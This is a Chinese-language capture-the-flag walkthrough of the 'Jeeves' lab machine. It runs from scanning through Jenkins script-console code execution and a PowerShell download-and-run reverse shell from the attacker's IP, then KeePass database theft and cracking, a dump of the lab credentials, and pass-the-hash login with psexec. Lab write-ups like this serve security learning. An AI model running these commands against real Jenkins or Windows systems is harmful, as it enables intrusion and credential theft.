信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.63 | TCP:80,135,445,50000 |
$ nmap -p- 10.10.10.63 --min-rate 1000 -sC -sV -Pn
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
HTTP 50000 && Jenkins
http://10.10.10.63:50000/
![[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图](https://img.4awl.net/img/ad/b76df43734b58d866c487ac3c66362.jpg "[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图")
$ feroxbuster --url http://10.10.10.63:50000/ --filter-status 404
![[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图1](https://img.4awl.net/img/02/c5eff2987a25f53fe7509700ec7033.jpg "[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图1")
Manage Jenkins -> Script Console
println "powershell.exe /c whoami /priv".execute().text
![[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图2](https://img.4awl.net/img/ad/acb45674bf7b036cb1aa123642cbf9.jpg "[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图2")
![[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图3](https://img.4awl.net/img/ca/eed5ce3b73ccef2f670c7fc1050a20.jpg "[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图3")
println "powershell.exe /c iex (New-Object Net.WebClient).DownloadString('http://10.10.16.17/Invoke-PowerShellTcp.ps1')".execute().text
![[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图4](https://img.4awl.net/img/d5/c5474b109803d57d4587584d30c65c.jpg "[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图4")
![[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图5](https://img.4awl.net/img/b6/77c6c5371bfda626211e45c6429494.jpg "[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图5")
User.txt
e3232272596fb47950d59c4cf1e7066a
权限提升 && KeePass
PS C:\Users\kohsuke\Documents> dir C:\Users\kohsuke\Documents
![[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图6](https://img.4awl.net/img/7b/87a502d76c16ab176e50fe557302c5.jpg "[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图6")
$ impacket-smbserver share /tmp/ -smb2support
PS C:\Users\kohsuke\Documents> copy C:\Users\kohsuke\Documents\CEH.kdbx \\10.10.16.17\share
![[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图7](https://img.4awl.net/img/e1/bc3aed2cfc0c3b7fdf49ca1197c61a.jpg "[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图7")
$ keepass2john CEH.kdbx >CEH.hash
$ hashcat -m 13400 CEH.hash /usr/share/wordlists/rockyou.txt --user
![[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图8](https://img.4awl.net/img/91/5b8d756637a993ab1d9a64d7d54a18.jpg "[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图8")
$keepass$2600001af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091393c97beafd8a820db9142a6a94f03f6b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcffcb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48:moonshine1
$ kpcli -kdb CEH.kdbx
kpcli:/> find .
Searching for "." ...
- 8 matches found and placed into /_found/
Would you like to list them now? [y/N]
=== Entries ===
0. Backup stuff
1. Bank of America www.bankofamerica.com
2. DC Recovery PW
3. EC-Council www.eccouncil.org/programs/cer
4. It's a secret localhost:8180/secret.jsp
5. Jenkins admin localhost:8080
6. Keys to the kingdom
7. Walmart.com www.walmart.com
kpcli:/> show -f 0
Path: /CEH/
Title: Backup stuff
Uname: ?
Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
URL:
Notes:
kpcli:/> show -f 1
Path: /CEH/
Title: Bank of America
Uname: Michael321
Pass: 12345
URL: https://www.bankofamerica.com
Notes:
kpcli:/> show -f 2
Path: /CEH/
Title: DC Recovery PW
Uname: administrator
Pass: S1TjAtJHKsugh9oC4VZl
URL:
Notes:
kpcli:/> show -f 3
Path: /CEH/
Title: EC-Council
Uname: hackerman123
Pass: pwndyouall!
URL: https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
Notes: Personal login
kpcli:/> show -f 4
Path: /CEH/
Title: It's a secret
Uname: admin
Pass: F7WhTrSFDKB6sxHU1cUn
URL: http://localhost:8180/secret.jsp
Notes:
kpcli:/> show -f 5
Path: /CEH/
Title: Jenkins admin
Uname: admin
Pass:
URL: http://localhost:8080
Notes: We don't even need creds! Unhackable!
kpcli:/> show -f 6
Path: /CEH/
Title: Keys to the kingdom
Uname: bob
Pass: lCEUnYPjNfIuPZSzOySA
URL:
Notes:
kpcli:/> show -f 7
Path: /CEH/
Title: Walmart.com
Uname: anonymous
Pass: Password
URL: http://www.walmart.com
Notes: Getting my shopping on
![[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图9](https://img.4awl.net/img/fe/c9db4bdc3ac948ab209831cc026d96.jpg "[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图9")
Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
使用NTLM哈希登录
$ impacket-psexec [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
![[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图10](https://img.4awl.net/img/b8/ed393c15471f7a1b730490dd307b5b.jpg "[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图10")
C:\Users\Administrator\Desktop> dir /R
![[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图11](https://img.4awl.net/img/74/c754a5f6ce1938e82ee87b1411b20d.jpg "[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图11")
C:\Users\Administrator\Desktop> powershell.exe /c Get-Content -Path .\hm.txt -Stream root.txt
![[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图12](https://img.4awl.net/img/d6/5e3c3d1576e956cb4b85965d5b95d4.jpg "[Meachines] [Medium] Jeeves Jenkins-RCE+KeePass-Cr…插图12")
Root.txt
afbc5bd4b615a60648cec41c6ac92530
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
